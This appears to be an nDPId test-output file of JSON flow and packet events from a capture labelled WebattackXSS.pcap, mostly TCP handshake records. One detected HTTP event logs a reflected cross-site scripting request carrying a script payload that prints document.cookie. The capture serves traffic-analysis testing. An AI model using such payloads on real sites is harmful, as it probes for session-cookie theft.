+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347669336,"flow_last_seen":1499347669336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347669336,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1499347669336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347669336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XbZAAD4GaBqsEAABwKgKMukQAFClPsiUAAAAAKACchBxcgAAAgQFtAQCCAoBO5UiAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":2,"flow_last_seen":1499347669336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347669336,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6RAzOJpLpT7IlaAScSA6UQAAAgQFtAQCCAoD5WaXATuVIgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":3,"flow_last_seen":1499347669337,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347669337,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XbdAAD4GaCGsEAABwKgKMukQAFClPsiVMziaTIAQAOXZWAAAAQEICgE7lSID5WaX"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347670582,"flow_last_seen":1499347670582,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347670582,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1499347670582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347670582,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Rc1AAD4GgAOsEAABwKgKMukeAFDr3NOXAAAAAKACchAeiwAAAgQFtAQCCAoBO5ZaAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":2,"flow_last_seen":1499347670582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347670582,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6R5lF6M+69zTmKAScSCrXwAAAgQFtAQCCAoD5WfPATuWWgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5888,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":3,"flow_last_seen":1499347670583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347670583,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Rc5AAD4GgAqsEAABwKgKMukeAFDr3NOYZRejP4AQAOVKZwAAAQEICgE7lloD5WfP"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347673136,"flow_last_seen":1499347673136,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347673136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1499347673136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347673136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89tVAAD4GzvqsEAABwKgKMuk4AFAtrG4NAAAAAKACchA\/rgAAAgQFtAQCCAoBO5jYAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":2,"flow_last_seen":1499347673136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347673136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6ThuKc6nLaxuDqAScSCViQAAAgQFtAQCCAoD5WpNATuY2AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5906,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":3,"flow_last_seen":1499347673137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347673137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09tZAAD4GzwGsEAABwKgKMuk4AFAtrG4ObinOqIAQAOU0kQAAAQEICgE7mNgD5WpN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347674433,"flow_last_seen":1499347674433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347674433,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1499347674433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347674433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DFZAAD4GuXqsEAABwKgKMulGAFBSGZZKAAAAAKACchDxsQAAAgQFtAQCCAoBO5ocAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":2,"flow_last_seen":1499347674433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347674433,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6UarF0RiUhmWS6AScSCToAAAAgQFtAQCCAoD5WuRATuaHAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5918,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":3,"flow_last_seen":1499347674434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347674434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DFdAAD4GuYGsEAABwKgKMulGAFBSGZZLqxdEY4AQAOUypwAAAQEICgE7mh0D5WuR"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347675703,"flow_last_seen":1499347675703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347675703,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1499347675703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347675703,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jIRAAD4GOUysEAABwKgKMulUAFDpsRfeAAAAAKACchDXOQAAAgQFtAQCCAoBO5taAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5929,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":2,"flow_last_seen":1499347675704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347675704,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6VSdi3bc6bEX36AScSBS\/AAAAgQFtAQCCAoD5WzPATubWgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":3,"flow_last_seen":1499347675704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347675704,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jIVAAD4GOVOsEAABwKgKMulUAFDpsRffnYt23YAQAOXyAwAAAQEICgE7m1oD5WzP"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347678198,"flow_last_seen":1499347678198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678198,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1499347678198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86nhAAD4G21esEAABwKgKMuluAFCn23eyAAAAAKACchC2sQAAAgQFtAQCCAoBO53KAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":2,"flow_last_seen":1499347678198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6W5MMi3pp9t3s6AScSDKUAAAAgQFtAQCCAoD5W8\/ATudygEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":3,"flow_last_seen":1499347678199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347678199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06nlAAD4G216sEAABwKgKMuluAFCn23ezTDIt6oAQAOVpWAAAAQEICgE7ncoD5W8\/"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347484263,"flow_last_seen":1499347551239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347679469,"flow_last_seen":1499347679469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347679469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1499347679469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80KNAAD4G9SysEAABwKgKMul8AFCXJE+kAAAAAKACchDuKwAAAgQFtAQCCAoBO58HAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":2,"flow_last_seen":1499347679469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6XyRTq6MlyRPpaAScSA6zgAAAgQFtAQCCAoD5XB8ATufBwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5963,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":3,"flow_last_seen":1499347679470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347679470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00KRAAD4G9TOsEAABwKgKMul8AFCXJE+lkU6ujYAQAOXZ1AAAAQEICgE7nwgD5XB8"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347675703,"flow_last_seen":1499347679471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347679471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27SZGGJRXX6DR9VWKN864H8LTBEZ6QC3GJPC8TUUNAED3BBL4L8P%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347680746,"flow_last_seen":1499347680746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347680746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1499347680746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qSxAAD4GHKSsEAABwKgKMumKAFCMLAlrAAAAAKACchA+DwAAAgQFtAQCCAoBO6BHAAAAAAEDAwc="} 